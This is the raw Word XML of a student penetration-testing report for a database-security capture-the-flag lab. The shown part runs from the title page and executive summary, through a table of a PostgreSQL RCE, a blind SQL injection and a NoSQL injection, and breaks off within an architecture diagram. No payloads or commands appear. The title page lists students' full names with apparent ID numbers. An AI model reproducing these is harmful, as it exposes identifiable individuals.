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4E667" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="1A97F348" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="525CE05B" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="5017DCAC" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="3E79959D" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>PENETRATION TESTING REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596D8DC9" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5D6D7E"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Database Security Lab — CN5134</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE54B7C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="5D6D7E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Course: SEC</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="5D6D7E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>304  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="5D6D7E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  Ain Shams </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="5D6D7E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>University  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="5D6D7E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  Spring 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACD9537" w14:textId="1422DB59" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5D6D7E"/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5D6D7E"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="5D6D7E"/>
        </w:rPr>
        <w:t xml:space="preserve">  1</w:t>
      </w:r>
      <w:r w:rsidR="001E207A">
        <w:rPr>
          <w:color w:val="5D6D7E"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="5D6D7E"/>
        </w:rPr>
        <w:t xml:space="preserve"> May 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E13F81" w14:textId="5C271095" w:rsidR="00E13696" w:rsidRDefault="00E2558E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5D6D7E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5D6D7E"/>
        </w:rPr>
        <w:t xml:space="preserve">Sara Abdallah Soliman 20231700319 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C9463E" w14:textId="77A4F2D9" w:rsidR="00E2558E" w:rsidRDefault="00E2558E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5D6D7E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5D6D7E"/>
        </w:rPr>
        <w:t>Salma Osama Mohamed 20231700225</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00762A1F" w14:textId="5EA6B746" w:rsidR="00E2558E" w:rsidRDefault="00E2558E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5D6D7E"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5D6D7E"/>
        </w:rPr>
        <w:t>Mennatallah</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5D6D7E"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ahmed Abdelmonem 20231700341</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567C211F" w14:textId="252161CC" w:rsidR="00E2558E" w:rsidRDefault="00E2558E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5D6D7E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5D6D7E"/>
        </w:rPr>
        <w:t>Carol Hany Nabil 20231700327</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E47452" w14:textId="3A7E51A9" w:rsidR="00E2558E" w:rsidRDefault="00E2558E" w:rsidP="00E2558E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5D6D7E"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5D6D7E"/>
        </w:rPr>
        <w:t>Farah Mohamed Hosny 20231700326</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1D376F" w14:textId="77777777" w:rsidR="00E2558E" w:rsidRDefault="00E2558E"/>
    <w:p w14:paraId="4C4E0FC1" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="3897BD15" w14:textId="31D77A2E" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="303D95D0" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1B3A6B"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A91578" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">This report documents the security assessment of a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Dockerized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve"> Capture-The-Flag (CTF) lab environment built for the CN5134 Database Security course at Ain Shams University. The lab simulates three real-world database attack scenarios, each running in an isolated Docker container with its own application stack, database engine, and exploit path. The goal is to demonstrate how common developer mistakes — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>unsanitized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve"> input, excessive database privileges, and absent type checking — combine to produce critical, fully exploitable vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A96C52" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>The assessment was conducted from the perspective of an external attacker with no prior knowledge of credentials or internal structure. All three vulnerabilities were successfully exploited and their flags captured during testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AD4375" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="6A01A5C9" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerabilities </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w: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1560"/>
        <w:gridCol w:w="1500"/>
        <w:gridCol w:w="1500"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E13696" w14:paraId="0A54C997" w14:textId="77777777">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C420F65" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerability</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D558DCD" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Type</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062DD1D6" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Database</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6D7A2A2" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</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3986FAEB" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="4F5AB3F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C64C84" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PostgreSQL RCE (CVE-2019-9193)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7259AA" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remote Code Execution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E6B662" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PostgreSQL 12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EFAF75" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CRITICAL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2AFDE3" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="563C3703"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5B72E5F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Blind SQL Injection (CWE-89)</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F7AE753" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Boolean-Based Blind SQLi</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9093BCF" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MySQL 8.0</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22485A2E" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HIGH</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CB8525A" w14:textId="0F8E40B0" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.</w:t>
            </w:r>
            <w:r w:rsidR="001E207A">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="419FB3F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1752A4" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NoSQL Operator Injection (CWE-943)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CA54A4" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Authentication Bypass + Data Exfil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1DE31C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MongoDB 6.0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9E603F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CRITICAL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DF17C6" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26C7C494" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="58CD1DEF" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>All three vulnerabilities represent realistic attack patterns found in production systems. Two are classified as Critical and one as High severity. Combined, they demonstrate injection attacks across relational and non-relational databases, as well as OS-level code execution through database privilege abuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50022E31" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB2FBDE" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1B3A6B"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2. Environment Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33756D55" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Architecture Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF02F1E" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">The lab consists of six Docker containers connected </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve"> a shared internal bridge network called lab-network. Three Flask web applications serve as the attack surface, each backed by a dedicated database container. The attacker machine (localhost) reaches each Flask app through an exposed port. The database containers are not directly reachable from outside the Docker network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4C788D" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="2FB98D38" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  ┌──────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6B6892" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  │                ATTACKER MACHINE (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">localhost)   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9790F7" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  │           browser / Python exploit scripts               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A12B2C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  └──────────┬─────────────────┬──────────────┬─────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26020FDA" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">             │                 │              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3826E202" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          :5001             :5002          :5003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B928F7" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">             │                 │              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48655516" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  ┌──────────▼──────┐  ┌───────▼──────┐  ┌───▼────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727E0029" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>│  vuln</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1-app      </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>│  │</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  vuln2-app   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>│  │</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  vuln3-app     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D9168F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>│  Flask</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Python) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>│  │</w:t>
      </w:r>
